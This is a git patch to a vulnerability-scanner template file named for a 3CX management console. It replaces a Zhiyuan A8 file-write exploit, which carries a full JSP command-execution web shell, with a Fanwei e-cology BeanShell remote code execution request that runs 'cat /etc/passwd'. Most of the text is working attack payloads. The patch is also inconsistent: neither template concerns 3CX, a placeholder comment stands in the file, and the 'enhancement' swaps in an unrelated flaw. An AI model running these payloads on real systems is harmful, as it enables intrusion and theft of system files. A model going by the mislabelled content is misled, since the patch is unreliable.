From 5cf7d44d120bc7d76dc827ab223fb6791dc43704 Mon Sep 17 00:00:00 2001
From: sullo <sullo@cirt.net>
Date: Fri, 6 May 2022 16:10:15 -0400
Subject: [PATCH] Enhancement:
 vulnerabilities/other/3cx-management-console.yaml by cs

---
 .../other/3cx-management-console.yaml         | 47 +++++--------------
 1 file changed, 12 insertions(+), 35 deletions(-)

diff --git a/vulnerabilities/other/3cx-management-console.yaml b/vulnerabilities/other/3cx-management-console.yaml
index 15ade36db2..782160457c 100644
--- a/vulnerabilities/other/3cx-management-console.yaml
+++ b/vulnerabilities/other/3cx-management-console.yaml
@@ -1,49 +1,26 @@
-id: CNVD-2019-19299
-# test
+id: CNVD-2019-32204
+# AAAAAAAA
 info:
-  name: Zhiyuan A8 Arbitrary File Write (RCE)
+  name: Fanwei e-cology <= 9.0 Remote Code Execution
   author: daffainfo
   severity: critical
+  description: The attacker can directly execute arbitrary commands on the target server by invoking the unauthorized access problem interface in the BeanShell component. Currently, the security patch for this vulnerability has been released. Please take protective measures as soon as possible for users who use the Fanwei e-cology OA system.
   reference:
-    - https://www.cxyzjd.com/article/guangying177/110177339
-    - https://github.com/sectestt/CNVD-2019-19299
-  tags: zhiyuan,cnvd,cnvd2019,rce
+    - https://blog.actorsfit.com/a?ID=01500-11a2f7e6-54b0-4a40-9a79-5c56dc6ebd51
+  tags: fanwei,cnvd,cnvd2019,rce
 
 requests:
   - raw:
       - |
-        POST /seeyon/htmlofficeservlet HTTP/1.1
+        POST /bsh.servlet.BshServlet HTTP/1.1
         Host: {{Hostname}}
-        Pragma: no-cache
-        Cache-Control: no-cache
-        Upgrade-Insecure-Requests: 1
-        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q =0.8,application/signed-exchange;v=b3
-        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
-        Connection: close
+        Content-Type: application/x-www-form-urlencoded
 
-        DBSTEP V3. 0 343 0 658 DBSTEP=OKMLlKlV
-        OPTION=S3WYOSWLBSGr
-        currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
-        = WUghPB3szB3Xwg66 the CREATEDATE
-        recordID = qLSGw4SXzLeGw4V3wUw3zUoXwid6
-        originalFileId = wV66
-        originalCreateDate = wUghPB3szB3Xwg66
-        FILENAME = qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdb4o5nHzs
-        needReadFile = yRWZdAS6
-        originalCreateDate IZ = 66 = = wLSGP4oEzLKAz4
-        <%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder ();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine( )) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString() ;} %><%if("x".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("{{randstr}}"))){out.println("<pre>" +excuteCmd(request.getParameter("{{randstr}}")) + "</pre>");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce
+        bsh.script=exec("cat+/etc/passwd");&bsh.servlet.output=raw
 
-      - |
-        GET /seeyon/test123456.jsp?pwd=asasd3344&{{randstr}}=ipconfig HTTP/1.1
-        Host: {{Hostname}}
-
-    req-condition: true
     matchers:
-      - type: dsl
-        dsl:
-          - 'status_code_2 == 200'
-          - 'contains(body_1, "htmoffice operate")'
-          - 'contains(body_2, "Windows IP")'
-        condition: and
+      - type: regex
+        regex:
+          - "root:.*:0:0:"
 
 # Enhanced by cs on 2022/05/06